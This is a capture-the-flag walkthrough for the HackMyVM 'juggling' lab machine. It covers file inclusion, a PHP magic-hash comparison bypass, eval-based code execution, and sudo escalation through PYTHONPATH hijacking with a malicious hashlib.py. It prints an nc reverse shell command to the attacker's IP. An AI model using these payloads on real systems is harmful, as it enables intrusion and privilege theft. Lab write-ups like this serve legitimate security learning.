当前位置：网站首页>hackmyvm: juggling walkthrough

hackmyvm: juggling walkthrough

2022-08-02 03:59:00 【xdeclearn】

1. get first shell

port scan:

在这里插入图片描述

add juggling.hmv to hosts and browsing port 80.

在这里插入图片描述

there is a file inclusion in the url blog.php?page=test

在这里插入图片描述

use this url by php pseudo-protocol, we get the source code of index.php.

在这里插入图片描述

base64 decode:

<?php
	session_start();
	require_once("sqldb_config.php");

	if(isset($_SESSION['username'])) {
        	header("Location: admin.php");
        	die();
    	}

	if (isset($_POST['submit'])) {
		$username = $_POST['username'];
		$password = $_POST['password'];
		$val1 = $_POST['val1'];
		$val2 = $_POST['val2'];

		$magicval = strcasecmp($val1,$val2);
		$key = md5("$username".$password);
		if (empty($val) && empty($val2)) {
			echo '<br><h1 style="text-align:center;color:red;"> Value 1 and Value2 can\'t be Empty </h1>';
			header("Refresh:3");
		} else {
			if ($val1 === $val2) {
				echo '<br><h1 style="text-align:center;color:red;"> Value 1 and Value2 can\'t be Same </h1>';
				header("Refresh:3");
			} else {
				if ($key == number_format($magicval * 1337)) {
					$_SESSION['username'] = "ryan";
					header("Location: admin.php"); die();
					# header("Location: http://s3cur3.juggling.hmv/index.php");
					header("Location: ../s3cur3/index.php");
				} else {
					header("Refresh:3");
				}
			}
		}
	}
?>

get a new url from the source code ../s3cur3/index.php and new host s3cur3.juggling.hmv. Add this host to hosts. By file inclusion see the index.php source code. Find eval, but this also need session.

在这里插入图片描述

how to get the session?

from the first code, set username=s87892, password=6199a(you can use other username and password, please visit https://github.com/spaze/hashes/blob/master/md5.md), so the md5(“$username”.$password) for key is 0e545993274517709034328855841020. set val1=test, val2=TEST, so the number_format($magicval * 1337) is 0. By md5 equal bypass, we get the session.

在这里插入图片描述

use this session, use post method to visit http://s3cur3.juggling.hmv/index.php. Finally by test.txt, write a simple shell test.php`.

在这里插入图片描述

content in test.txt: system("/bin/nc -e /bin/bash 192.168.85.169 4444");

get the first shell.

在这里插入图片描述

2. get the user’s privilege

check sudo, find user rehan can run md5.py with no password and can set the env. so change the env “PYTHONPATH” to user-defined paht “/tmp/test”, and there is a python file named hashlib.py.

import os

class Test(object):
    
    def __init__(self, test):
        self.test = test
        
    def hexdigest(self):
        return self.test
        
def md5(test):
    os.system("/bin/bash -i")
    return Test(test)

run command: sudo -u rehan PYTHONPATH=/tmp/test /opt/md5.py, get the user rehan.

在这里插入图片描述